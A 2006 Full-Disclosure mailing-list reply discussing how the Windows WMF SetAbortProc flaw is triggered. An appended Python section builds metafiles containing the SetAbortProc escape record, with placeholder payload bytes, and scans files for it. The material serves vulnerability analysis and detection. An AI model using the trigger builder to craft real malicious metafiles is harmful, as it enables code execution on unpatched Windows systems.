
Re: [Full-disclosure] Steve Gibson smokes crack?



On 1/13/06, Peter Ferrie <pferrie@xxxxxxxxxxxx> wrote:
> [snip]
> >does any know the circumstances, in all cases, where the bug is
> >triggered or is there only speculation based upon exploit code
> >"working" against a given vulnerable implementation of the API?
>
> The triggering mechanism is well-understood: this incorrect record
> length requirement is simply wrong.  There is no "magic key".
> It is possible to create entirely well-formed files that will
> execute.  I don't know why Steve couldn't get it working properly,
> and I'd like to know just how he managed to get it working at all
> on Windows 2000 (see below).  So, what we have is this:
>
> The file must not begin with the placeable (aka Aldus) meta file
> header.  If it does begin with that, then the function is ignored,
> and Windows continues to parse the file.
> This is why Windows 9x, NT, and 2000, do not execute anything from
> within Internet Explorer, for example - they do not support WMF
> files without the Aldus header.
>
> The record must be reachable.  It will not execute if the EOF
> record (function number 00) is seen first.
>

Ahh, perfect!  Thanks Peter, that clears up a lot for me.  In fact, does
this also infer that all you need is a "crapped" up pluggable viewer
for IE on Windows 9x, etc. to exploit this flaw on one of those O/Ss?
Does this further indicate that Office 98 and other M$ Office versions
that run on the earlier O/Ss and support the WMF mapping are
'vulnerable' to exploitation - still?

Thanks, you provided a cogent and direct response; it was very helpful
(at least to me) in getting to the meat of this discussion.

-e

> That's all.  To clarify some other things:
>
> The record length can be any value at all, as long as it remains
> within the bounds of the file.  Before executing any record,
> Windows checks that the next record is accessible.
>
> The file does not have to end with the EOF record, but there must
> be one in the file.
>
> The smallest metafile is 18 bytes.  That's the header only.
> The smallest parsable metafile is 24 bytes (EOF record only).
> The smallest SetAbortProc file for Windows XP is 62 bytes.
>
> 8^) p.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
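The conditions Peter lists above (no placeable header, every record inside the file bounds, the SetAbortProc escape reachable before the EOF record, an EOF record present somewhere, and a record length that can be anything as long as it stays within the file) can be written down as a small checker. The following is an added example, not code from the thread or from Windows: the record walker is a simplification of how the post describes GDI's parsing, not GDI's actual logic, and the sample files it builds are constructed here with placeholder bytes (0xCC) in place of anything executable. Header layouts (18-byte METAHEADER, 22-byte placeable header with key 0x9AC6CDD7, record = rdSize in words + rdFunction + rdParm, META_ESCAPE = 0x0626, SETABORTPROC = 9) are the standard WMF definitions.

```python
"""Build and scan WMF files for a reachable SetAbortProc escape record.

Added example: encodes the triggering conditions from the post as a checker.
The walker is a simplification, not GDI's code; sample files are constructed.
"""
import struct

PLACEABLE_MAGIC = 0x9AC6CDD7   # key of the placeable ("Aldus") header
METAHEADER_SIZE = 18           # standard METAHEADER, the smallest metafile
META_EOF = 0x0000
META_ESCAPE = 0x0626
ESC_SETABORTPROC = 9


def metaheader(size_words, max_record_words):
    """18-byte METAHEADER: mtType, mtHeaderSize (words), mtVersion,
    mtSize (words), mtNoObjects, mtMaxRecord (words), mtNoParameters."""
    return struct.pack("<HHHIHIH", 1, 9, 0x0300, size_words, 0, max_record_words, 0)


def record(function, params=b"", pad_words=0):
    """One record: rdSize (in words, counting itself), rdFunction, rdParm.
    pad_words inflates rdSize beyond what the parameters need; the post says
    Windows accepts any length that stays inside the file."""
    body = params + (b"\0" if len(params) % 2 else b"") + b"\0\0" * pad_words
    return struct.pack("<IH", 3 + len(body) // 2, function) + body


def setabortproc_record(payload=b"\xcc\xcc", pad_words=0):
    """META_ESCAPE carrying escape number 9 (SETABORTPROC).
    The payload is a placeholder for the bytes GDI would call, nothing more."""
    params = struct.pack("<HH", ESC_SETABORTPROC, len(payload)) + payload
    return record(META_ESCAPE, params, pad_words)


def build_wmf(records, placeable=False):
    """Records behind a METAHEADER, optionally prefixed by the placeable header."""
    body = b"".join(records)
    max_rec = max((struct.unpack_from("<I", r)[0] for r in records), default=0)
    data = metaheader((METAHEADER_SIZE + len(body)) // 2, max_rec) + body
    if placeable:
        # key, hmf, bbox (left, top, right, bottom), inch, reserved, checksum (not computed)
        data = struct.pack("<IHhhhhHIH", PLACEABLE_MAGIC, 0, 0, 0, 100, 100, 96, 0, 0) + data
    return data


def scan(data):
    """Return (triggered, reason) per the post's rules: no placeable header,
    each record within bounds (so the next one is accessible), EOF not seen
    before the escape, and an EOF record present somewhere in the file."""
    if len(data) >= 4 and struct.unpack_from("<I", data)[0] == PLACEABLE_MAGIC:
        return False, "placeable (Aldus) header present: escape is ignored"
    if len(data) < METAHEADER_SIZE:
        return False, "shorter than the 18-byte METAHEADER"
    off, found = METAHEADER_SIZE, False
    while True:
        if off + 6 > len(data):
            return False, "ran off the end of the file without an EOF record"
        size_words, func = struct.unpack_from("<IH", data, off)
        end = off + size_words * 2
        if size_words < 3 or end > len(data):
            return False, "record at offset %d is not within the file" % off
        if func == META_EOF:
            return found, "EOF reached; SetAbortProc escape %s" % ("seen" if found else "not seen")
        if (func == META_ESCAPE and size_words >= 4
                and struct.unpack_from("<H", data, off + 6)[0] == ESC_SETABORTPROC):
            found = True          # reachable; keep walking to confirm an EOF exists
        off = end


# Constructed sample files (hypothetical, not taken from any real exploit).
def sample_eof_only():
    return build_wmf([record(META_EOF)])                     # 24 bytes: smallest parsable file

def sample_trigger(pad_words=0):
    return build_wmf([setabortproc_record(pad_words=pad_words), record(META_EOF)])

def sample_placeable():
    return build_wmf([setabortproc_record(), record(META_EOF)], placeable=True)

def sample_eof_first():
    return build_wmf([record(META_EOF), setabortproc_record()])

def sample_truncated():
    # the escape record claims 66 words, but the file is cut at 40 bytes
    return build_wmf([setabortproc_record(pad_words=60)])[:40]

def sample_no_eof():
    return build_wmf([setabortproc_record()])


if __name__ == "__main__":
    for name, f in [("eof only", sample_eof_only), ("trigger", sample_trigger),
                    ("oversize length", lambda: sample_trigger(pad_words=7)),
                    ("placeable", sample_placeable), ("eof first", sample_eof_first),
                    ("truncated", sample_truncated), ("no eof", sample_no_eof)]:
        print("%-16s %s" % (name, scan(f())))
```

The "oversize length" case is the point Peter makes about record length: the escape record's rdSize is padded well beyond what its parameters need, and the checker still reaches it because the record stays inside the file. The truncated and no-EOF cases show the two ways a file fails the accessibility rule. The 62-byte XP minimum he mentions is not reproduced here; these samples are only meant to make the conditions concrete.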